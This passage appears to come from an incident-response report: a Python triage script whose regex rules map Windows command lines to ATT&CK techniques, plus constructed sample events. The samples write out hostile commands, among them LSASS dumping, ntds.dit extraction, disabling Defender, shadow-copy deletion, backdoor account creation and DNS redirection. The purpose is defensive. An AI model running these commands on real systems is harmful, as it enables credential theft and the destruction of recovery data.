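     r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b|Add-LocalGroupMember\b.*Administrators", "T1098"),
    ("Password-protected archive created",
     r"\b(?:rar|winrar)(?:\.exe)?\s+a\b.*\s-(?:hp|p)\S*", "T1560.001"),
    ("Data staged in C:\\Users\\Public",
     r"\brobocopy\b.*\\Users\\Public", "T1074.001"),
    ("Interface DNS server changed",
     r"netsh\s+interface\s+ipv?4?\s+set\s+dns\b|Set-DnsClientServerAddress\b", "T1071.004 (preparation)"),
    ("AS-REP roasting",
     r"\basreproast\b|DoesNotRequirePreAuth|GetNPUsers", "T1558.004"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE), tid) for name, rx, tid in RULES]


def triage_process_events(events):
    """events: dicts with ts, host, user, cmd (4688 / Sysmon 1 style).
    Returns a time-ordered list of matches; one event can trip several rules."""
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        for name, rx, tid in COMPILED:
            if rx.search(ev["cmd"]):
                hits.append({**ev, "rule": name, "attack": tid})
    return hits


def techniques_by_host(hits):
    """Host -> set of ATT&CK IDs, the summary table of a report."""
    out = {}
    for h in hits:
        out.setdefault(h["host"], set()).add(h["attack"])
    return out


# Constructed events in deliberately shuffled order; hostnames, users and
# timestamps are assumed, and the command lines are reconstructions of the
# actions described in the report, not copies of the original records.
SAMPLE_EVENTS = [
    {"ts": "2025-01-15T10:42:00Z", "host": "DC01", "user": "WEINNOVATE\\Administrator",
     "cmd": 'ntdsutil "ac i ntds" "ifm" "create full C:\\Windows\\Temp\\backup" q q'},
    {"ts": "2025-01-15T09:05:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2025-01-15T09:31:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\Temp\\shell.ps1"},
    {"ts": "2025-01-15T09:40:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "net user admin P@ss123 /add"},
    {"ts": "2025-01-15T10:10:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\Temp\\lsass.dump full"},
    {"ts": "2025-01-15T10:50:00Z", "host": "DC01", "user": "WEINNOVATE\\Administrator",
     "cmd": 'rar.exe a -hpSECRET C:\\Windows\\Temp\\backup.rar "C:\\Windows\\Temp\\backup\\Active Directory\\ntds.dit" C:\\Windows\\Temp\\backup\\registry\\SYSTEM'},
    {"ts": "2025-01-15T11:20:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "netsh interface ip set dns Ethernet static 192.168.100.179"},
    {"ts": "2025-01-15T11:45:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "vssadmin delete shadows /all /quiet"},
    {"ts": "2025-01-15T10:05:00Z", "host": "PC10", "user": "WEINNOVATE\\jdoe",
     "cmd": "ipconfig /all"},                                   # discovery only; no rule fires
]

if __name__ == "__main__":
    for h in triage_process_events(SAMPLE_EVENTS):
        print(h["ts"], h["host"], h["attack"], h["rule"])
    print(techniques_by_host(triage_process_events(SAMPLE_EVENTS)))
```

Pure discovery commands (`ipconfig`, `arp -a`, `net view`, `ping`) are deliberately left out of the rules: on their own they fire constantly in a normal environment, and their value here comes from their position in the timeline between the credential-theft and staging steps, which the ordered output makes visible.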

This report was created by:

* Fares Ebrahim Morcy
* Abdelrahman Adly lofty
* Amany Osama GadElmawla
* Mohamed Elsayed Moghazy
* Hoda amr Mohamed
* Karim fathy salem
* Youssef Khaled Sayed
* Amjed Hatem

